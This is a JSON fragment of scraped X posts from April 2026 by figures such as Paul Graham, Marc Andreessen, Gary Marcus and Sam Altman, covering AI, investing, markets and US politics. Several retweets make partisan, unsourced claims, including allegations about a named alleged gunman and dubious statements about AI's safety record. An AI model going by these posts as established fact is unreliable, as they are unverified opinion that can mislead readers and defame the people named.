March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://x.com/paulg/status/2048615296613937201", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048614869352714619", + "published_at": "2026-04-27T04:07:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "🇺🇸", + "url": "https://x.com/pmarca/status/2048614659595583651", + "published_at": "2026-04-27T04:06:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases (in the universe).", + "url": "https://x.com/pmarca/status/2048614305705386433", + "published_at": "2026-04-27T04:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2048612144871264609", + "published_at": "2026-04-27T03:56:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending!", + "url": "https://x.com/pmarca/status/2048610397243265189", + "published_at": "2026-04-27T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://x.com/GaryMarcus/status/2048608025464705084", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://x.com/elonmusk/status/2048600964102246438", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending recommending.", + "url": "https://x.com/pmarca/status/2048598334492033455", + "published_at": "2026-04-27T03:01:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048597298150875169", + "published_at": "2026-04-27T02:57:11+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://x.com/GaryMarcus/status/2048593283639894520", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048591674688037210", + "published_at": "2026-04-27T02:34:50+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://x.com/elonmusk/status/2048589691054694406", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://x.com/GaryMarcus/status/2048589239915577837", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", + "url": "https://x.com/pmarca/status/2048589233095643240", + "published_at": "2026-04-27T02:25:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://x.com/GaryMarcus/status/2048582672163995766", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://x.com/jason/status/2048580651985604783", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://x.com/GaryMarcus/status/2048580122521780676", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://x.com/GaryMarcus/status/2048579079121555764", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://x.com/GaryMarcus/status/2048578055283880296", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", + "url": "https://x.com/pmarca/status/2048573035616375134", + "published_at": "2026-04-27T01:20:46+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://x.com/GaryMarcus/status/2048570082843082905", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://x.com/GaryMarcus/status/2048567837221089669", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://x.com/GaryMarcus/status/2048558998325166498", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://x.com/sama/status/2048554097985593849", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://x.com/GaryMarcus/status/2048553390540734479", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://x.com/GaryMarcus/status/2048552931923013916", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://x.com/sama/status/2048552677433643427", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://x.com/elonmusk/status/2048543344746250466", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://x.com/elonmusk/status/2048535299102265720", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://x.com/HarryStebbings/status/2048531257399664920", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048515643268567431", + "published_at": "2026-04-26T21:32:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://x.com/elonmusk/status/2048512831692452091", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://x.com/jason/status/2048487905543237675", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://x.com/HarryStebbings/status/2048486182904852537", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://x.com/ylecun/status/2048469956627468510", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://x.com/jason/status/2048465651723882972", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://x.com/jason/status/2048463405590225173", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://x.com/ylecun/status/2048453901930660058", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2048450286902235560", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://x.com/jason/status/2048437340218044499", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", + "url": "https://x.com/charliebilello/status/2048436641451155650", + "published_at": "2026-04-26T16:18:48+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://x.com/jason/status/2048436081725464959", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://x.com/elonmusk/status/2048435593244237849", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://x.com/ylecun/status/2048432684930654430", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter", + "title_zh": "当前行业呼吁重新审视操作系统和用户界面设计逻辑,强调开发人机协同及适用于智能体的新一代互联网协议,或推动终端计算架构革新" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://x.com/sama/status/2048426122854228141", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048419415222259820", + "published_at": "2026-04-26T15:10:21+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://x.com/HarryStebbings/status/2048418806867870115", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://x.com/paulg/status/2048413815675539816", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://x.com/paulg/status/2048413578789634100", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://x.com/paulg/status/2048411898081583547", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://x.com/paulg/status/2048411021329453562", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048406550897729561", + "published_at": "2026-04-26T14:19:13+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048401720540061794", + "published_at": "2026-04-26T14:00:02+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://x.com/HarryStebbings/status/2048400836024283246", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://x.com/jason/status/2048399674269213067", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://x.com/ylecun/status/2048399621492236615", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048397937156518387", + "published_at": "2026-04-26T13:45:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://x.com/paulg/status/2048396013816152216", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048394162366533935", + "published_at": "2026-04-26T13:30:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048390341221404827", + "published_at": "2026-04-26T13:14:49+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://x.com/paulg/status/2048370801833828507", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://x.com/ylecun/status/2048293118781296734", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://x.com/jason/status/2048249992163242220", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://x.com/jason/status/2048247267182658004", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://x.com/jason/status/2048245718171648271", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", 